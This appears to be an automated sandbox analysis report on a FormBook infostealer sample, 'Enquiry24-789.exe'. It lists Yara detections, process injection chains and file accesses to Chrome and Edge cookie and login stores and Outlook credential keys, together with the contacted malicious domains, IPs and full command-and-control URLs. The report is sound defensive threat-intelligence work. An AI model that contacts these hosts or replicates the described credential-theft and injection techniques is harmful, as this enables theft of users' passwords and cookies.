Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: Enquiry24-789.exe Binary or memory string: WIN_81
Source: Enquiry24-789.exe Binary or memory string: WIN_XP
Source: Enquiry24-789.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Enquiry24-789.exe Binary or memory string: WIN_XPe
Source: Enquiry24-789.exe Binary or memory string: WIN_VISTA
Source: Enquiry24-789.exe Binary or memory string: WIN_7
Source: Enquiry24-789.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C51204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00C51204
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C51806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C51806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1486291 Sample: Enquiry24-789.exe Startdate: 01/08/2024 Architecture: WINDOWS Score: 100 28 www.hongsuilai6.shop 2->28 30 www.emme4.online 2->30 32 6 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 48 4 other signatures 2->48 10 Enquiry24-789.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Found API chain indicative of sandbox detection 10->62 64 Writes to foreign memory regions 10->64 66 2 other signatures 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 FNvzpsCDjtsg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sdchange.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 FNvzpsCDjtsg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 hongsuilai6.shop 172.96.186.184, 49719, 49720, 49721 SINGLEHOP-LLCUS Canada 22->34 36 emme4.online 195.110.124.133, 49723, 49724, 80 REGISTER-ASIT Italy 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.110.124.133
 emme4.online Italy
39729 REGISTER-ASIT false
172.96.186.184
 hongsuilai6.shop Canada
32475 SINGLEHOP-LLCUS false
85.159.66.93
 natroredirect.natrocdn.com Turkey
34619 CIZGITR false
104.21.60.220
 www.udexo.net United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
www.udexo.net 104.21.60.220 true
hongsuilai6.shop 172.96.186.184 true
emme4.online 195.110.124.133 true
natroredirect.natrocdn.com 85.159.66.93 true
www.hongsuilai6.shop unknown unknown
www.dressroza.com unknown unknown
www.emme4.online unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.hongsuilai6.shop/xn9u/?UVlTmRqX=q8LzHox7RKtGG/WH6JXrmw9pXNpRdFEjHUHiLytE9RGxs1ZcrBZWnD7zumm7JdwcoayhhaK8FSh+TemNQ2QWneapzb32QtJY487IrOyf2rTmigHB/KHNG0HIAnjyt24TlA==&TLK01=EF3pc2 false
  • Avira URL Cloud: safe
 unknown
http://www.emme4.online/dujn/ false
  • Avira URL Cloud: safe
 unknown
http://www.udexo.net/7jx3/?UVlTmRqX=+ZJdQBUjgznkAaTTT3SjyJP/zh+/jdRgdsYgjgQhEU+FM1ZsFkM6/delRywd8pmg9PnOVEnqV6AkYRdeiGJOBd6cD9VKa4nHXqnB4M+5ykQI5xbgCxtTjetQx9crTGFA+g==&TLK01=EF3pc2 false
  • Avira URL Cloud: safe
 unknown
http://www.udexo.net/7jx3/ false
  • Avira URL Cloud: safe
 unknown
http://www.hongsuilai6.shop/xn9u/ false
  • Avira URL Cloud: safe
 unknown
http://www.dressroza.com/ylqc/?UVlTmRqX=AIQenQVDJquvL6CtOttF+rAVEsK4B/9dMyVncsTuYD+LzDwt76VT23ot9Accg6DLScK9AXzr2Nn7uFwrhbH/mmP9iiPkm6E+u9eqnOj9VLHaoNNAK1eH6jHrEJ2Cg0Z1jw==&TLK01=EF3pc2 false
  • Avira URL Cloud: safe
 unknown